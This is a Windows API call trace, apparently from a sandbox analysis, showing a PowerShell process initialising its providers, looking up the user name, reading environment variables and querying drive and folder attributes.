	[0217.003] RegOpenKeyExW (in: hKey=0x2e4, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d538 | out: phkResult=0x12d538*=0x35c) returned 0x0
	[0217.003] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d538 | out: phkResult=0x12d538*=0x0) returned 0x2
	[0217.003] RegOpenKeyExW (in: hKey=0x2e4, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d538 | out: phkResult=0x12d538*=0x360) returned 0x0
	[0217.003] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d538 | out: phkResult=0x12d538*=0x0) returned 0x2
	[0217.003] RegOpenKeyExW (in: hKey=0x2e4, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d538 | out: phkResult=0x12d538*=0x364) returned 0x0
	[0217.003] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d538 | out: phkResult=0x12d538*=0x0) returned 0x2
	[0217.003] RegOpenKeyExW (in: hKey=0x2e4, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d538 | out: phkResult=0x12d538*=0x368) returned 0x0
	[0217.003] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d538 | out: phkResult=0x12d538*=0x0) returned 0x2
	[0217.003] RegOpenKeyExW (in: hKey=0x2e4, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d538 | out: phkResult=0x12d538*=0x0) returned 0x5
	[0217.543] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x29e0008
	[0218.177] ReportEventW (hEventLog=0x29e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x30a5660*="WSMan", lpRawData=0x30a53d0) returned 1
	[0218.179] CoTaskMemAlloc (cb=0x104) returned 0x3839f0
	[0218.179] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3839f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0218.179] CoTaskMemFree (pv=0x3839f0) 
	[0218.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0218.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0218.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0218.181] CoTaskMemAlloc (cb=0x804) returned 0x1b98b0c0
	[0218.181] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b98b0c0, nSize=0x12d798 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x12d798) returned 0x1
	[0218.181] CoTaskMemFree (pv=0x1b98b0c0) 
	[0218.181] CoTaskMemAlloc (cb=0x204) returned 0x3631c0
	[0218.182] GetUserNameW (in: lpBuffer=0x3631c0, pcbBuffer=0x12d7d8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x12d7d8) returned 1
	[0218.182] CoTaskMemFree (pv=0x3631c0) 
	[0218.182] ReportEventW (hEventLog=0x29e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x30aaff0*="Alias", lpRawData=0x30aad80) returned 1
	[0218.185] CoTaskMemAlloc (cb=0x104) returned 0x3839f0
	[0218.185] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3839f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0218.185] CoTaskMemFree (pv=0x3839f0) 
	[0218.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0218.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0218.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0218.187] CoTaskMemAlloc (cb=0x804) returned 0x1b98b0c0
	[0218.187] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b98b0c0, nSize=0x12d798 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x12d798) returned 0x1
	[0218.187] CoTaskMemFree (pv=0x1b98b0c0) 
	[0218.187] CoTaskMemAlloc (cb=0x204) returned 0x3631c0
	[0218.187] GetUserNameW (in: lpBuffer=0x3631c0, pcbBuffer=0x12d7d8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x12d7d8) returned 1
	[0218.187] CoTaskMemFree (pv=0x3631c0) 
	[0218.188] ReportEventW (hEventLog=0x29e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x30b0598*="Environment", lpRawData=0x30b0328) returned 1
	[0218.216] CoTaskMemAlloc (cb=0x104) returned 0x3839f0
	[0218.216] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3839f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0218.216] CoTaskMemFree (pv=0x3839f0) 
	[0218.217] CoTaskMemAlloc (cb=0x104) returned 0x3839f0
	[0218.217] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x3839f0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0218.217] CoTaskMemFree (pv=0x3839f0) 
	[0218.217] CoTaskMemAlloc (cb=0x104) returned 0x3839f0
	[0218.217] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x3839f0, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf
	[0218.217] CoTaskMemFree (pv=0x3839f0) 
	[0218.218] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x12d340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0218.218] SetErrorMode (uMode=0x1) returned 0x1
	[0218.218] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x12d550 | out: lpFileInformation=0x12d550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0218.218] SetErrorMode (uMode=0x1) returned 0x1
	[0218.219] GetLogicalDrives () returned 0x4
	[0218.219] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0218.220] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0218.220] SetErrorMode (uMode=0x1) returned 0x1
	[0218.221] CoTaskMemAlloc (cb=0x68) returned 0x1b964890
	[0218.221] CoTaskMemAlloc (cb=0x68) returned 0x1b964900
	[0218.221] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b964890, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x12d520, lpMaximumComponentLength=0x12d51c, lpFileSystemFlags=0x12d518, lpFileSystemNameBuffer=0x1b964900, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12d520*=0x705ba84c, lpMaximumComponentLength=0x12d51c*=0xff, lpFileSystemFlags=0x12d518*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0218.221] CoTaskMemFree (pv=0x1b964890) 
	[0218.221] CoTaskMemFree (pv=0x1b964900) 
	[0218.222] SetErrorMode (uMode=0x1) returned 0x1
	[0218.222] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0218.223] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d260, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0218.223] SetErrorMode (uMode=0x1) returned 0x1
	[0218.223] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d4c0 | out: lpFileInformation=0x12d4c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0218.223] SetErrorMode (uMode=0x1) returned 0x1
	[0218.223] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d260, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0218.223] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12d110, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0218.223] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0218.223] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12d040, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0218.224] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0218.224] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d090, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0218.224] SetErrorMode (uMode=0x1) returned 0x1
	[0218.224] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d2f0 | out: lpFileInformation=0x12d2f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0218.224] SetErrorMode (uMode=0x1) returned 0x1
	[0218.224] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d090, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0218.225] SetErrorMode (uMode=0x1) returned 0x1
	[0218.225] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d2f0 | out: lpFileInformation=0x12d2f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0218.225] SetErrorMode (uMode=0x1) returned 0x1
	[0218.225] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d130, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0218.225] SetErrorMode (uMode=0x1) returned 0x1
	[0218.225] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d390 | out: lpFileInformation=0x12d390*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0218.225] SetErrorMode (uMode=0x1) returned 0x1
	[0218.225] CoTaskMemAlloc (cb=0x804) returned 0x1b98b0c0
	[0218.225] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b98b0c0, nSize=0x12d798 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x12d798) returned 0x1
	[0218.226] CoTaskMemFree (pv=0x1b98b0c0) 
	[0218.226] CoTaskMemAlloc (cb=0x204) returned 0x3631c0
	[0218.226] GetUserNameW (in: lpBuffer=0x3631c0, pcbBuffer=0x12d7d8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x12d7d8) returned 1
	[0218.226] CoTaskMemFree (pv=0x3631c0) 
	[0218.226] ReportEventW (hEventLog=0x29e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x30b75f0*="FileSystem", lpRawData=0x30b7380) returned 1
	[0218.227] CoTaskMemAlloc (cb=0x104) returned 0x3839f0
	[0218.227] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3839f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0218.227] CoTaskMemFree (pv=0x3839f0) 
	[0218.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0218.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0218.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0218.229] CoTaskMemAlloc (cb=0x804) returned 0x1b98b0c0
	[0218.229] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b98b0c0, nSize=0x12d798 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x12d798) returned 0x1
	[0218.229] CoTaskMemFree (pv=0x1b98b0c0) 
	[0218.229] CoTaskMemAlloc (cb=0x204) returned 0x3631c0
	[0218.229] GetUserNameW (in: lpBuffer=0x3631c0, pcbBuffer=0x12d7d8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x12d7d8) returned 1
	[0218.230] CoTaskMemFree (pv=0x3631c0) 
	[0218.230] ReportEventW (hEventLog=0x29e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x30bcde0*="Function", lpRawData=0x30bcb70) returned 1
	[0218.234] CoTaskMemAlloc (cb=0x104) returned 0x3839f0
	[0218.234] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3839f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0218.234] CoTaskMemFree (pv=0x3839f0) 
	[0224.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0224.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0224.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0224.330] CoTaskMemAlloc (cb=0x804) returned 0x1b98b0c0
	[0224.330] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b98b0c0, nSize=0x12d798 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x12d798) returned 0x1
	[0224.986] CoTaskMemFree (pv=0x1b98b0c0) 
	[0224.986] CoTaskMemAlloc (cb=0x204) returned 0x3631c0
	[0224.986] GetUserNameW (in: lpBuffer=0x3631c0, pcbBuffer=0x12d7d8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x12d7d8) returned 1
	[0224.987] CoTaskMemFree (pv=0x3631c0) 
	[0224.988] ReportEventW (hEventLog=0x29e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x30ef020*="Registry", lpRawData=0x30eedb0) returned 1
	[0225.132] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.132] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.132] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.132] CoTaskMemAlloc (cb=0x804) returned 0x1b98b0c0
	[0225.132] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b98b0c0, nSize=0x12d798 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x12d798) returned 0x1
	[0225.133] CoTaskMemFree (pv=0x1b98b0c0) 
	[0225.133] CoTaskMemAlloc (cb=0x204) returned 0x3631c0
	[0225.133] GetUserNameW (in: lpBuffer=0x3631c0, pcbBuffer=0x12d7d8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x12d7d8) returned 1
	[0225.133] CoTaskMemFree (pv=0x3631c0) 
	[0225.133] ReportEventW (hEventLog=0x29e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x30f43e8*="Variable", lpRawData=0x30f4178) returned 1
	[0225.174] CoTaskMemAlloc (cb=0x104) returned 0x3839f0
	[0225.174] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3839f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0225.174] CoTaskMemFree (pv=0x3839f0) 
	[0225.176] CoTaskMemAlloc (cb=0x104) returned 0x3839f0
	[0225.176] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3839f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0225.176] CoTaskMemFree (pv=0x3839f0) 
	[0225.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0225.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0225.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0225.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0228.410] CoTaskMemAlloc (cb=0x804) returned 0x1b98b0c0
	[0228.410] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b98b0c0, nSize=0x12d798 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x12d798) returned 0x1
	[0228.411] CoTaskMemFree (pv=0x1b98b0c0) 
	[0228.411] CoTaskMemAlloc (cb=0x204) returned 0x3631c0
	[0228.411] GetUserNameW (in: lpBuffer=0x3631c0, pcbBuffer=0x12d7d8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x12d7d8) returned 1
	[0228.411] CoTaskMemFree (pv=0x3631c0) 
	[0228.411] ReportEventW (hEventLog=0x29e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3107fb0*="Certificate", lpRawData=0x3107d40) returned 1
	[0229.000] CoTaskMemAlloc (cb=0x104) returned 0x3839f0
	[0229.000] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3839f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0229.000] CoTaskMemFree (pv=0x3839f0) 
	[0229.003] GetLogicalDrives () returned 0x4
	[0229.003] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12d420, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0229.003] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0229.004] CoTaskMemAlloc (cb=0x20e) returned 0x1b965dd0
	[0229.004] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b965dd0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0229.004] CoTaskMemFree (pv=0x1b965dd0) 
	[0229.005] CoTaskMemAlloc (cb=0x104) returned 0x3839f0
	[0229.005] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3839f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0229.005] CoTaskMemFree (pv=0x3839f0) 
	[0229.006] CoTaskMemAlloc (cb=0x104) returned 0x3839f0
	[0229.006] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3839f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0229.006] CoTaskMemFree (pv=0x3839f0) 
	[0229.021] CoTaskMemAlloc (cb=0x104) returned 0x3839f0
	[0229.021] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3839f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0229.021] CoTaskMemFree (pv=0x3839f0) 
	[0229.027] CoTaskMemAlloc (cb=0x104) returned 0x3839f0
	[0229.027] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3839f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0229.027] CoTaskMemFree (pv=0x3839f0) 
	[0229.028] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x12d180, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0229.028] SetErrorMode (uMode=0x1) returned 0x1
	[0229.028] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x12d3e0 | out: lpFileInformation=0x12d3e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0229.029] SetErrorMode (uMode=0x1) returned 0x1
	[0229.029] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x12d180, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0229.029] SetErrorMode (uMode=0x1) returned 0x1
